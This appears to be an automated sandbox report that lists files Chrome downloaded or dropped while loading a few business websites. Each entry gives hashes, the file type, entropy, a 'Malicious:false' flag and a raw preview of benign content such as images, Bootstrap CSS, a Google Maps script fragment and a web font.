                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1546)
                                              Category:dropped
                                              Size (bytes):3482
                                              Entropy (8bit):5.280960217431154
                                              Encrypted:false
                                              SSDEEP:96:aPfvCM5D9f/xjdN3EGUkJuJ5VofaNdVzN2JfE:cfaM5D9f/xjfEGUjbofaNdV4ZE
                                              MD5:E48F188473D454074A2AB3A34870A0CB
                                              SHA1:620BC90A66495D3CE47B303DE88EE0419455733A
                                              SHA-256:E0DE807AE54325DFC02FA6EBE3C2F863BC5428B8E8FD98A9FE96119A953FD103
                                              SHA-512:D41F5430C6AEE123E05095FF41EFA6D68CE4DB7D99CB3EE1343DFF5AFB02D36A960C42CBC190E14119D174E557EAA995E4A324BBD935C95D2B30227E61CE41EE
                                              Malicious:false
                                              Reputation:low
                                              Preview:google.maps.__gjsload__('search_impl', function(_){var izb=function(a,b){_.Bg(a.Gg,3,b)},mzb=function(a,b,c){var d=new jzb;d=_.WG(d);c.ur=d.load.bind(d);c.clickable=a.get("clickable")!==!1;_.EZa(c,_.lQ(b));b=[];b.push(_.bk(c,"click",kzb.bind(null,a)));for(const e of["mouseover","mouseout","mousemove"])b.push(_.bk(c,e,lzb.bind(null,a,e)));b.push(_.bk(a,"clickable_changed",()=>{a.Eg.clickable=a.get("clickable")!==!1}));a.Fg=b},kzb=function(a,b,c,d,e){let f=null;if(e&&(f={status:e.getStatus()},e.getStatus()===0)){f.location=_.V(e.Gg,2)?new _.Mj(_.$s(_.J(e.Gg,.2,_.et).Gg,1),_.$s(_.J(e.Gg,2,_.et).Gg,2)):null;const g={};f.fields=g;const h=_.Zh(e.Gg,3);for(let k=0;k<h;++k){const m=_.Zq(e.Gg,3,_.vQ,k);g[m.getKey()]=m.getValue()}}_.nk(a,"click",b,c,d,f)},lzb=function(a,b,c,d,e,f,g){let h=null;f&&(h={title:f[1].title,snippet:f[1].snippet});_.nk(a,b,c,d,e,h,g)},nzb=function(){},ozb=class{},pzb=class extends _.U{constructor(){super()}Pi(){return _.ri(this.Gg,2)}},qzb=[_.M,,,_.so,_.V_a];var rzb=cla
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:downloaded
                                              Size (bytes):85053
                                              Entropy (8bit):7.9741446241005365
                                              Encrypted:false
                                              SSDEEP:1536:7tfYspZtJxa3My5WBvOKn48svFlg6g8G1UAH3r+iwbiHqk+dArPuyec59Bd9:7t57I3MqhKn47vFWnF17H3r+iwbUqk+e
                                              MD5:9AB36147B377010901879591F4A6F405
                                              SHA1:E0CECE187F6FE881DF612282D03484CA00A3A4D3
                                              SHA-256:0CF25AEF812FE3EBB0064457682D90F917235FFE1AD48E985466E1DB77B7587D
                                              SHA-512:F98FCFE51E64E79CD9E5D26C9DE6C9B188DB4955DC214701F02B22B57DD71B69BB942572267628FF1246A50BF11B3700D8621A1EB1C169CE356DCE9A1C5C9396
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/services/8/7523864d851a062fc2bcbe906bf008d5.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:C6701F23934411ED9720B1AA81A24AFA" xmpMM:DocumentID="xmp.did:C6701F24934411ED9720B1AA81A24AFA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C6701F21934411ED9720B1AA81A24AFA" stRef:documentID="xmp.did:C6701F22934411ED9720B1AA81A24AFA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............HV..._..L;..........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):6170
                                              Entropy (8bit):7.964666159336286
                                              Encrypted:false
                                              SSDEEP:192:E7D5oqG22OwH7xKfriNSCfbSGBvjohK7vtPUYiy:qDu2wH7sfeYabSGBvjohqlPUw
                                              MD5:5A4A2CBD5E2F05B759687D15494CB63F
                                              SHA1:E6C6CD0C36D809ECE9DBCC5D0EAB207396909EDA
                                              SHA-256:216F9CE02C8F87BC794AB1E88D1AAA614F42BB34DEAF82F8956D8C1D4CF5E6EC
                                              SHA-512:1DAAEED8AB5351A464834CF864C2DB4DCA83D84ED6B5DACD63DE4E265EEE12D4C6AF31E1E37B6BBA3A6419713AC77A8D7CFB42A00CD6114D7C42361AF1A5DB95
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE......V..A..N..M..J..F.....J..D..S..H..X..?.....P..V..Y..B.....O.....<|.......[...........H...........I..O.....E..L..N........a.....7z.J.....]..U.....T...........W.....U..:..H..T..:..O.....@.....S........E..F..5w.e..F}...]..+_....&K....U...l.H..u..Q.....?..R..b....>..0h....;r........k..|.....c...........3n..w.....:..O..B.._..R..Z..D....Ce.W..s....I..K..]..7y....i..\..&V....n....1l....I..Y....1W.Z..y..Yx.B{....H.....r..Z......f$.....IDATh.Vm..X.6. b+...4X..CbZ....L.C(i".F..7qS....K..&P[d............NW/[.1/....s.s..r......$.X.......L...jY`..I..d.#.....[c.6.D..<r0.r....@%.7.\....p8.......,.w.\J.....c5..6.<..;c..Kp.j'.....,.......sC......*.d1..X.9E.g....2..7..r}...:.<.0.g......K..E..<.@.r.Zov{}>.tL3.....\0...Ob.$b..Vz...|HV..`..7s.q...\.ey8..c7...\4..f..%......T..rs...3.......0P..z..@...^.UH.H.t.......U.k.. ..(Z.6.n.....UbwV.A.7.W.f..-a...l...(....^@".y2d-.....!Fc.0..-WY.SZV.o.)....~...,xJ.`..$e.P9..I.j.n..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):28
                                              Entropy (8bit):4.378783493486177
                                              Encrypted:false
                                              SSDEEP:3:HhCkuw:HUkuw
                                              MD5:8929D7F2E5C61CAF8258EDC662C8D4B0
                                              SHA1:0F790C1DE63930C9B2269D625D07947C1884DD1D
                                              SHA-256:A297AD447E0A4D1806FCC8FED69CA53356FC073F89A92D88F95609CBE4F84FEB
                                              SHA-512:5D64565AC6EF29FC447E7146D1DDE72FAB646E735DAD1B2FB444D17D907CC67CAED05AE7783C91D4484CB5B8912D5FB8166D58E1D5DACE6A76DEDFEF26933F72
                                              Malicious:false
                                              Reputation:low
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwl0BfU01v8lRxIFDVNaR8USBQ3OQUx6?alt=proto
                                              Preview:ChIKBw1TWkfFGgAKBw3OQUx6GgA=
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 640x828, components 3
                                              Category:downloaded
                                              Size (bytes):45790
                                              Entropy (8bit):7.901802095450207
                                              Encrypted:false
                                              SSDEEP:768:VAgsqdoZqRwJicgXF4okHPBaAP+ENKGAIigacH+DKaL+0npBP:VAmo5aV4okYAPbK3oaE+DVL+qB
                                              MD5:BC242FE53AD46DA8C738EAA89E5954DF
                                              SHA1:FBBD503EB6713289C15B5586B6A8CCE527EE55DD
                                              SHA-256:E88F3B3D826DDC03E8CD69082C028366277DCD045BADF073996B603B95750889
                                              SHA-512:9D82BE5E31D178169F251067128DA7BB08CAC1385DAD8C280118EF58250B125711F89AE4D873FAEE44EBF86051BD9B1C1F9D753867F4CF2FA5D8F05237E436FD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/certifications/3/b28c762ff89177dacd4852c7b909ca34.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:AC3E76A1930B11ED8DEF92E1224A4ED7" xmpMM:DocumentID="xmp.did:AC3E76A2930B11ED8DEF92E1224A4ED7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AC3E769F930B11ED8DEF92E1224A4ED7" stRef:documentID="xmp.did:AC3E76A0930B11ED8DEF92E1224A4ED7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................'..'2&.&2.&&&&.>55555>DAAAAAADDDDDDDDDDDDDDDDDDDDDDDDDDDDD.... . &..&6& &6D6++6DDDB5BDDDDDDDDDDDDDDDDDDDDDDDD
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6150
                                              Entropy (8bit):7.967626236152151
                                              Encrypted:false
                                              SSDEEP:96:Hx9ihsN+fpVjbkVJYKgTN5B+g/B9pVxvzxOOAgi3k7mGh+D7OWNAr3sfC+:RYIEnjbkVzq/B9trxOZ03h+D723gC+
                                              MD5:1A26ECFFFBFD99EE55010250E237BE04
                                              SHA1:DECCAE84FDEDA23A7CF2A255557C451C9A802614
                                              SHA-256:C759243814EE0916A46A381060B893057DC1B0C70787B6EE629AB6EF28E31BBC
                                              SHA-512:7EE26F576650C705F7370EE4D727C34A8C0197D664DFF92407750F8035DABB4EDA0BA88B491CDDBB0EB7F865C17F98CE6DF6B0F564173F848CA2205009A993D9
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/world-wide-web.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.S..7.....7yf...3~.......8~....P.....M..O...v..............c.....i..d...............H.................W........6r..............c........?.......f.....y...............+j.........;..R........Q..................f.......`......Y...........G.....c...................[.!...........|.........z.t.....R.d........<..s...........D."O.....g....4a.Q....a..r..k..Lr....M}.o.........j.....Q...........o.+..'s. I.>..;.._..6..u..q.......IDATh...S....a..a.m@.d.MbX.e.E..Eq.q..w.[....Y/e.?....yu..i.X.a8......J.+c].VBG.0.f.Fk.KK...^G...`p.f.3.[#...\....DKX..j%d.?..<.O;......5........J...0.GB.,..l/...... .p|".p8@..=...9...W.. ..+....FC.......=....js.f.8u......e.............z.~.7.v.M<1....V..m..G..\_.oE|........=..O/..B<>..@.us"...._6sj5.jC...GA..)...5.). h..y@..J.OM...p......CK...,y.p..C..../.]......1.RA.8...c.pK.vl....+....0.Z.0...dR..V. .....A.......Y.=.-....z.....-...YM;..L.\..A.+...R...'..j.. ...i4..^].37....U8..q.z%..C.!v.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3423
                                              Entropy (8bit):7.926911822882082
                                              Encrypted:false
                                              SSDEEP:48:6pfDb+kOHpIYKV9EzoV1E96jmvycVfci9GkA50PuC4kW3Vn3ZIl963P3Ekb:6pfJQpM9m96d4Ui9Gkr43LsGfFb
                                              MD5:1C86FCF9DEE024E4CE21F1D10FEC0515
                                              SHA1:A108E744E81FDECE77BBF4F79E56CA0215CB13D9
                                              SHA-256:16EF663936C823C75598224F8C86C906F923D3723A856F63626E4FF2C719E62E
                                              SHA-512:B21498A5B35496D0852EBB1C25A7407C127817BCC5D4BFBABFE657683C224D4A603FBDF641F4FA279448B004B25D506D6DD6BD4288E127582032430BEE7F3EE5
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...MPLTE..J .c3+..../+....2,....!!e>. .m" j'$t..h..R......4-...E..84-{...$#i.7v..C+*.......;...%.p.2r...#"f...%.Q.)]9....2-..._..:.....<z...$h.5e.....>;....9...I'!....1{{'.]..U..(A...#L...a^.D.+.j..X..&.2t.].....|.@|..R*Bd:3.E(YH.......0.;O>>...|.....&*[g.....Q..zT...A...X...s/d..R...S hmj.].K.FpV@y`^..O....k.qKK~.oG..B..e.....UM....IDATh..._.j...d..X.!.&L..!!.....k...l..^..o.j......Z..^.. -..9.]............./...D.....x*.h.....'G.d..yN.s.E...(.0..?.W*.H.hU....1$..t..Y.....fr....n..-.......?.I\..X..].*.2N.~J.xr.....r.=d)..D<^..l....e.m.U......z.]o....*....L..mZq....D...\$.<..h...n....i.u.........0.."c.6I.`.A?..=.!.d.......Q.......Tj.D......$.*..n..A.r...w...!....N ...."...j.9...(.$E..+\0.....R....U...f..F.7'..R..q..r..x.4.P.L>....D&.H.....(..X'6@.V. .R.E.EqUr...~...#F..)%.\....!..k.p...F...B!(`n+..@..A/....}.]*L .VO...A\.TURu.utp.>h.2.L&S..Xj..v.-..l...ph.... *..U_G.!..=@S$.......o+4..6.E.9r..I..H.E}$..m....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):12658
                                              Entropy (8bit):7.984596538119976
                                              Encrypted:false
                                              SSDEEP:384:LxkOxpSsb4nFTa4Whgi9k2eo/t2Xid03U2eKs3BUZeZrP:lkO7SCqBa4WaFo/8SZKqyZe
                                              MD5:6C3005527E11636FBA7366BF9B8C4079
                                              SHA1:D667AEBCAAECB5AAA775E0695BA67CD82C6F4926
                                              SHA-256:B1C54CF12A7EF3DFDB0AD55D3C885D40958423F36E3FB210F987569C1B9B12D7
                                              SHA-512:C11BE59DEFBF58E30699AFE17C712581ADE7FF30CB22629132CE6FB39F518812EBBFCD7D50A1AEC30AB004344C54D351EBB35FBEC57B3EC27CB8486A1DEE5378
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/services/mob.webp
                                              Preview:RIFFj1..WEBPVP8X........+.....ALPH-.....2...l.e&&.*.E......z....n...y..)...2S.......`....0.I .....=" ..6.7U.G;!.......G..B..?4.%%.....Q||.......s..,.2...`;.&.\>?...QK-z...iZj..../J.!...=.../r. ...?s.s...&..]....W.k%..+.c.h.O.xf.U.m.v.D..!.3.+.o..j.W.B3aD.W...%....{...N.....A.......]A.C...8.W+..<.[n.....Qb....U.4K...|.8..a.....N...........\..x`..lM@..Q..._.%...A.d.~......~Q.oC..:..o._.....I...'.F...5m..,..[.Y2$..YIA#..v...C.a..O.Q............L0|.hL.Ty2......#.9&........EjA....5.............$l..0E..z....Y..e...]2h.....p.B..Q_..R.....et.m...b...7^...p.*............]...L.3..]..EW<..6...m.W..u....R...1Ng.D.."........cP.g.Q.`.Z.lw.vQM{.^....P.4.L...G.....~Q....<...9..."...1..K....6....(.........m...Y..m..}BT.q.....|..N....v.J...U-...9g.=.s8..(N..W.....#.'k.;..!...m...Y.B.....`U...V.....O..(;=q,...G.^.LD4P.n..`......^.@.`.w...78...... .F.....Q...~.......|.,`.K...M..A...D.j.HYt.....%.g.. .&...9.....C8... 9....K..#.mJ.|.X.DB(...2.*A.t..D..J..L.74..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):11726
                                              Entropy (8bit):7.951180892939952
                                              Encrypted:false
                                              SSDEEP:192:ZIIHUCD4watTGcbgGegLg4oVDrOcKYmSfUKp6DHQDr+j/MfaRYw855ZbtxQPSV0:f0woTBb6Mox6cKYZVMH7ED59tfe
                                              MD5:93E4CB95B27FDD854669D7BDBE93BC05
                                              SHA1:2D59242B05678C4FFE5775FE79989E2DF1A89C8C
                                              SHA-256:D5ACB2B6D850E275D761335125AE99E1193CA91095E88EC2DA36099E03EB2B5E
                                              SHA-512:27DF77CC4893CF8A5682B3691BA077746C1D49E057103C2D005B37BECBA484C1DE72CB414C0572823AA47EB5D8618CFF26B1830530347C8155AA1F52CF5672B2
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N.....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3886
                                              Entropy (8bit):7.934858264863833
                                              Encrypted:false
                                              SSDEEP:48:rR0rsavyc18iStjC0uPCSSQ8LASuVJjeVjs1uLygAu3CnNVGMlGhSG+4Wc5:WNyc1sQPxoiJjGjs1DgANXewrA
                                              MD5:43C09CE328CD4B4723323487ED20047D
                                              SHA1:2D5EB828ED65D16B9FB8B81E1070809951AA9A64
                                              SHA-256:DF917693DD1E1A1091ADA90DCAE7F32B4E6EC33E668E50DB53E33C2C1F512B88
                                              SHA-512:EE73C5742A17B17D2C3E0151765671385184DA61F3DDF4CAB84ACEA53813A60C3D4C56B1955C7458946C1AB33D3BE3A6D7F7E4BBD0036B656366AB7A8E1BAA51
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...p...Qv...0............Vz....N{y~.......l...........g.....hz..Ww.........n...S..Vv...y..g........(.....{..Xp.P~...j|....,..}}.h...Z.u.........W..Z|...^~.....~....l..................................[ur~......t..q.......5.......Gn,*A.Xp......=?Vbt.?........;.........H..R..QSh....t..\yV`z^.....l..V..ux.]..,..B.....b......il}....Y.9Ln._.....t....8.......'...j..e...\..~..r....a.......M#.....|.w..a.}3].A]..+..`..m.......u.FF%...3IDATh...W.....!,...$@....K...j@.X.....U..G..j........'..h......3.$&..~.g.D...%.HM......B".JDI.PH.j..G..>mkR.xN....SS....)...3.L..Z.8[....JzeE/R.Z..k.....O.....}".0L.].........g.........1.8j.......*............5.]].u.."e...x..OK$......M...........j.f...\.N..U9....a.2...4.n.I....V.D.."....Z.X...V+Vjn.....5[...(.0....`>.SK|>.V(.H..T......u....~.T:..l..w...O.3d.N..Ab.<.h!...,....,..k...~(...o.......d........C..a.G....KC..MH.)........rU{..o...s..E<~.....V}_.-s.@........".w.%..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):13930
                                              Entropy (8bit):7.6514240437143295
                                              Encrypted:false
                                              SSDEEP:384:4YNg7C5ln/wdPuKVpMLOIvsxXn21PqY57PB:4Yy25lsuooUN2p57p
                                              MD5:C0010CB0B98F444BAC09CEE19448A862
                                              SHA1:ED60D4229E8DA4475D3E2148C01F09FD06916C1C
                                              SHA-256:EE7F66AAF252B1FD0EE6C3561A868B934566C8497E42F1D950C56DB1B0DE86BD
                                              SHA-512:4AD740253FD652D57DE6C5E38EAE381E9F7B04996463691225D524FCD03A26CDB71E7463AE086A7393764431631B188F76D9C464CB70ADCF90AEB47FB39D8449
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Unicode text, UTF-8 text, with very long lines (65300)
                                              Category:downloaded
                                              Size (bytes):193529
                                              Entropy (8bit):5.014363132838949
                                              Encrypted:false
                                              SSDEEP:1536:xtGMGH2K5wlP7WIgHf73Z6LsKkVkpz600I4lp:xtGMZvkVkpz600I4lp
                                              MD5:6D9C6FDA1E7087224431CC8068BB998F
                                              SHA1:6273AC1A23D79A122F022F6A87C5B75C2CFAFC3A
                                              SHA-256:FB1763B59F9F5764294B5AF9FA5250835AE608282FE6F2F2213A5952AACF1FBF
                                              SHA-512:A3F321A113D52C4C71663085541B26D7B3E4CED9339A1EC3A7C93BFF726BB4D087874010E3CF64C297C0DDD3D21F32837BC602B848715EADD8EF579BFE8E9A9A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/css/bootstrap.min.css
                                              Preview:@charset "UTF-8";/*!. * Bootstrap v5.2.0-beta1 (https://getbootstrap.com/). * Copyright 2011-2022 The Bootstrap Authors. * Copyright 2011-2022 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 107656, version 770.768
                                              Category:downloaded
                                              Size (bytes):107656
                                              Entropy (8bit):7.988418656993996
                                              Encrypted:false
                                              SSDEEP:3072:V0/0UwQXWQbJqmIzgq7bj6rlHtk7DtpVhrXyN:U9JrVqupHEZpVRiN
                                              MD5:E2F5B365C7D3D4497DA73148DDFAE997
                                              SHA1:B99813B3C531D8FE90AED3B75D2ED71F8E0C87F4
                                              SHA-256:C61287C2FA9863B5FB5844C683A168AC6520C94D822BB43D5EAE35C3A2A82166
                                              SHA-512:0F2BCA31548D8BFA20DD6247D31E7651DA018FDA325F0299B5404B5FE4390CAC7215882362E8960CEFD67CBAC631E5B6E6872F4A5CE67692999C588C9C914F6C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/webfonts/fa-brands-400.woff2
                                              Preview:wOF2...................>.........................8.$. .`.....L..`.... . .._Qw.e.8...3..HOZ-..U.:1....~..?...........&x.....7.y.7"t(w.,.e.PgoM..m".....8.<.$..<.._..............q|.~3....TD.u"8o...i.]-.[-uK.%u...dK.[.-M...C.0.....9b.e...........#Z....T..\.]3....5...3K.......|.....h[2.$.l.2..Ik..eB..`.......2..<N..{...B.L.%9l..l.d../...^.<X"......\L..ykZ....?..]....w...h$..JHB2...I...Z...%.ml...Z/.3^.Y.gf..xF.efp..x.g..+g...7K+.r.R.2WH...._....0.....2"......#2.Fd.#.......@...H.9..s.f....dd...(`D$.s6......b.(.m......=....v.....v.[.[..n..]}.5,G..[...h...>...o.....e....._..R....)[f.MdZ.~.{.@O..[e4.I.E..A).].L&g#....Z..i.V`..d..T...?|X.&.j...p.w.q.......(.Z...p,Q._....1]Qf...vgJ..,t.$.<v5...t.;.....~5.*..J......[...J.....z.r..Hl..`.Q.0.%.........+....?.6\G.........RI..+g9e?..g..Y.n}l&:.!..O..(u$...S...~.....%.~...Mc..8.s.%...y...._....4..>.2].....sD..t...^.]ik..>.Z..4.P....Ce..k.,x!.....u.|MO|K...4.h..\=J..e...T.....lG.s.^N.0..F.u%..Q...}.(x..z
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):78900
                                              Entropy (8bit):7.9972804490010985
                                              Encrypted:true
                                              SSDEEP:1536:oW+thaK3/9C4utrtapVjDKvQfc7yCdr3w3G2VhyhspDHyCcp/gW8MjV6:oWS9C4krtWOvIRT3G2VohsNHyCXW16
                                              MD5:5871405B407E424BCA4E3DD3357FEA5A
                                              SHA1:16D8AAD44F84CDEE5D11A7EEDC172E885DB6F29A
                                              SHA-256:9C0F0BC339AB37B3B5FBC8763EB7C601305F404717660C11790E3584F3BDC150
                                              SHA-512:7C8B2357F1D93B82C59673180EF9F49C75096602F24B0EC33E50F95B71AA067DCB7976BF02760A852FC7899B228286D109FC5704EC474FB65660344EF5B6446B
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF,4..WEBPVP8X..............VP8 .3..0....*....>.n.P)&..'...@..cn.1.....l..`yC..z........l?k.C.I.|.....G..m~....,&M......F<.g......{.......>.._.U.}........Q.w...........}...?.......Y..i.3..6?......o.. .V........}G............<.v...._..._.>.wh...i.s......M.r...+......W..~.N.3k.f....GA..XP..9h...M.._4_.<..j....^..z......^.T.s....A.T..hu.i._@.D...meT..*..g...._..DOE.f...k..c...0'.......[\.......8...x.v.s6t[.o.swKb.....-?>.C........5......=A)....y..xT..>..'he..&.*....&...z..s;Nr..h.Bq.P0..1.YI...)"./..K.2.X.V..;Y.....a......Cf.......>.X.....L..a;..y....Y.W.[../..}...d>.B..aU5Eq/...B.l.i)(p....B..P.+..E6.~..M..._....eB..........m.omcS2^.m.:..}..O.:u.]...<.d.*..u]9.W.+.H/3..)@7.9IT.....d.:.Kz....j...=..\]$....h..T.>...g.+a.WU...F.X..c.D...j.IYf....\P.k/.KUQ.s..q..h.T....r..u...Q./.}..3.H.\.P..*........&$/=!.X).....%F8...g.l#.!fau....89..)...i..@X.....k0....<..m...7F.....#....[zwO..&vh..?..H}e..[..r.....o...2e...=.....<...|..g%......L.-..o
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):20270
                                              Entropy (8bit):7.792719823244924
                                              Encrypted:false
                                              SSDEEP:384:4YNg7W1oO1ttlTwBNPTvCGOoP+ieyk9MUn/7CCsmEz:4Yy5O/3GPTCGOoPVQ9MUn/gmEz
                                              MD5:97553796FA26EC8B37786B02FCDFD013
                                              SHA1:75D574E7ACE87AD01FA5D4ED46B15DF55D3529A2
                                              SHA-256:E1E3F357A08EDE1767F49675EE40C178A12F3F3A712FC9996BE871F6A95C277B
                                              SHA-512:B22A7F9F4809CEFCFF13D939861EA44F0C1A1734E533396159D044F5220B5620FCBA02536AA8EDAE6B1E8F144EA1A09494B5913BD65E6B9CDE2F91640E4F090B
                                              Malicious:false
                                              Reputation:low
